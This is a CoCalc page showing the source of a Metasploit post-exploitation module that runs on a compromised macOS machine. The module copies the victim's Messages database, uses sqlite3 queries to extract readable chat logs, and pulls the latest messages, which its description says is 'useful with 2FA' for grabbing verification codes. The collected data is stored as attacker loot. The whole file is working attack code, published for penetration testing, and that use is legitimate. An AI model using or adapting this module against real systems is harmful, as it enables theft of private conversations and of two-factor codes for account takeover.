Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/osx/gather/enum_messages.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Auxiliary::Report

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'OS X Gather Messages',

15
        'Description' => %q{

16
          This module will collect the Messages sqlite3 database files and chat logs

17
          from the victim's machine. There are four actions you may choose: DBFILE,

18
          READABLE, LATEST, and ALL. DBFILE and READABLE will retrieve all messages, and

19
          LATEST will retrieve the last X number of messages (useful with 2FA). Module

20
          was tested with OS X 10.11 (El Capitan).

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => ['Geckom <geckom[at]redteamr.com>'],

24
        'Platform' => ['osx'],

25
        'SessionTypes' => ['meterpreter', 'shell'],

26
        'Actions' => [

27
          ['DBFILE', { 'Description' => 'Collect Messages DB file' }],

28
          ['READABLE', { 'Description' => 'Collect Messages DB and download in a readable format' }],

29
          ['LATEST', { 'Description' => 'Collect the latest message' }],

30
          ['ALL', { 'Description' => 'Collect all Messages data' }]

31
        ],

32
        'DefaultAction' => 'ALL',

33
        'Notes' => {

34
          'Stability' => [CRASH_SAFE],

35
          'SideEffects' => [],

36
          'Reliability' => []

37
        }

38
      )

39
    )

40


41
    register_options(

42
      [

43
        OptInt.new('MSGCOUNT', [false, 'Number of latest messages to retrieve.', 3]),

44
        OptString.new('USER', [false, 'Username to retrieve messages from (defaults to current user)'])

45
      ]

46
    )

47
  end

48


49
  def run

50
    user = datastore['USER'] || cmd_exec('/usr/bin/whoami')

51


52
    # Check file exists

53
    messages_path = "/Users/#{user}/Library/Messages/chat.db"

54


55
    unless file_exist?(messages_path)

56
      fail_with(Failure::Unknown, "#{peer} - Messages DB does not exist")

57
    end

58


59
    print_good("#{peer} - Messages DB found: #{messages_path}")

60


61
    files = []

62


63
    # Download file

64
    files << get_db(messages_path) if action.name =~ /ALL|DBFILE/i

65
    files << readable(messages_path) if action.name =~ /ALL|READABLE/i

66
    files << latest(messages_path) if action.name =~ /ALL|LATEST/i

67


68
    save(files)

69
  end

70


71
  #

72
  # Collect messages db file.

73
  #

74
  def get_db(messages_path)

75
    print_status("#{peer} - Looting #{messages_path} database")

76
    message_data = read_file(messages_path)

77
    { filename: 'messages.db', mime: 'bin', data: message_data }

78
  end

79


80
  #

81
  # Generate a readable version of the messages DB

82
  #

83
  def readable(messages_path)

84
    print_status("#{peer} - Generating readable format")

85
    sql = [

86
      'SELECT datetime(m.date + strftime("%s", "2001-01-01 00:00:00"), "unixepoch", "localtime")  || " " ||',

87
      'case when m.is_from_me = 1 then "SENT" else "RECV" end || " " ||',

88
      'usr.id || ": " || m.text, a.filename',

89
      'FROM chat as c',

90
      'INNER JOIN chat_message_join AS cm ON cm.chat_id = c.ROWID',

91
      'INNER JOIN message AS m ON m.ROWID = cm.message_id',

92
      'LEFT JOIN message_attachment_join AS ma ON ma.message_id = m.ROWID',

93
      'LEFT JOIN attachment as a ON a.ROWID = ma.attachment_id',

94
      'INNER JOIN handle usr ON m.handle_id = usr.ROWID',

95
      'ORDER BY m.date;'

96
    ]

97
    sql = sql.join(' ')

98
    readable_data = cmd_exec("sqlite3 #{messages_path} '#{sql}'")

99
    { filename: 'messages.txt', mime: 'text/plain', data: readable_data }

100
  end

101


102
  #

103
  # Generate a latest messages in readable format from the messages DB

104
  #

105
  def latest(messages_path)

106
    print_status("#{peer} - Retrieving latest messages")

107
    sql = [

108
      'SELECT datetime(m.date + strftime("%s", "2001-01-01 00:00:00"), "unixepoch", "localtime")  || " " ||',

109
      'case when m.is_from_me = 1 then "SENT" else "RECV" end || " " ||',

110
      'usr.id || ": " || m.text, a.filename',

111
      'FROM chat as c',

112
      'INNER JOIN chat_message_join AS cm ON cm.chat_id = c.ROWID',

113
      'INNER JOIN message AS m ON m.ROWID = cm.message_id',

114
      'LEFT JOIN message_attachment_join AS ma ON ma.message_id = m.ROWID',

115
      'LEFT JOIN attachment as a ON a.ROWID = ma.attachment_id',

116
      'INNER JOIN handle usr ON m.handle_id = usr.ROWID',

117
      "ORDER BY m.date DESC LIMIT #{datastore['MSGCOUNT']};"

118
    ]

119
    sql = sql.join(' ')

120
    latest_data = cmd_exec("sqlite3 #{messages_path} '#{sql}'")

121
    print_good("#{peer} - Latest messages: \n#{latest_data}")

122
    { filename: 'latest.txt', mime: 'text/plain', data: latest_data }

123
  end

124


125
  #

126
  # Do a store_root on all the data collected.

127
  #

128
  def save(data)

129
    data.each do |e|

130
      e[:filename] = e[:filename].gsub(/\\ /, '_')

131
      p = store_loot(

132
        e[:filename],

133
        e[:mime],

134
        session,

135
        e[:data],

136
        e[:filename]

137
      )

138


139
      print_good("#{peer} - #{e[:filename]} stored as: #{p}")

140
    end

141
  end

142
end

143


144